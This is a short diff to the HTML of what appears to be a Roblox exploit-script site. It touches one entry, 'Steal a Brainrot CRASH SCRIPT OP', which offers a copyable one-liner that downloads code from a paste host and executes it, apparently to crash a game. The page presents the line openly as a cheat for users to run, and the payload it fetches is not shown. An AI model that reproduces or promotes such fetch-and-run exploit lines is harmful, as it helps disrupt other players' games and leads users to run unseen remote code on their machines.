--- a/index.html
+++ b/index.html
@@ -363,7 +363,8 @@
         <div class="scripts-container">
             <div class="script-item">
     <div class="script-title">1. Steal a Brainrot CRASH SCRIPT OP</div>
-    <div class="code-box" id="script1">loadstring(game:HttpGet("https://pastefy.app/DdqmAYYX/raw"))()</div>
+    <div class="code-box" id="script1">loadstring(game:HttpGet("https://pastefy.app/DdqmAYYX/raw"))()
+</div>
     <button class="copy-btn" onclick="copyToClipboard('script1', this)">Copy To Clipboard</button>
 </div>
 
